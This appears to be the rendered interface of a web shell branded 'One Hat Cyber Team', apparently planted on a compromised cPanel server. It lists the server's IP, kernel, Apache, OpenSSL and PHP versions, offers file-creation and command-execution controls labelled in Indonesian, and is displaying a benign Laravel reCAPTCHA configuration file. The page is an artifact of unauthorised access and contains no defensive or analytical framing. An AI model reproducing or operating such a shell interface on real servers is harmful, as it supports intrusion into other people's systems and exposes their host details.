⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.19
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
id
/
dalily.dev-unit.com
/
config
/
View File Name :
recaptcha.php
<?php /* * To configure correctly please visit https://developers.google.com/recaptcha/docs/start */ return [ /* * The site key * Get site key @ www.google.com/recaptcha/admin */ 'site_key' => env('RECAPTCHA_SITE_KEY', ''), /* * The secret key * Get secret key @ www.google.com/recaptcha/admin */ 'secret_key' => env('RECAPTCHA_SECRET_KEY', ''), /* * The language code * Get more info @ https://developers.google.com/recaptcha/docs/versions */ 'lang' => 'en', /* * ReCATCHA version * Supported: "v2", "invisible", "v3", * * Get more info @ https://developers.google.com/recaptcha/docs/versions */ 'version' => env('RECAPTCHA_VERSION', 'v2'), /* * IP addresses for which validation will be skipped */ 'skip_ip' => [], /* * Default route called to check the Google reCAPTCHA token */ 'validation_route' => env('RECAPTCHA_VALIDATION_ROUTE', 'recaptcha/validate'), /* * The name of the parameter used to send Google reCAPTCHA token to verify route */ 'token_parameter_name' => env('RECAPTCHA_TOKEN_PARAMETER_NAME', 'token'), ];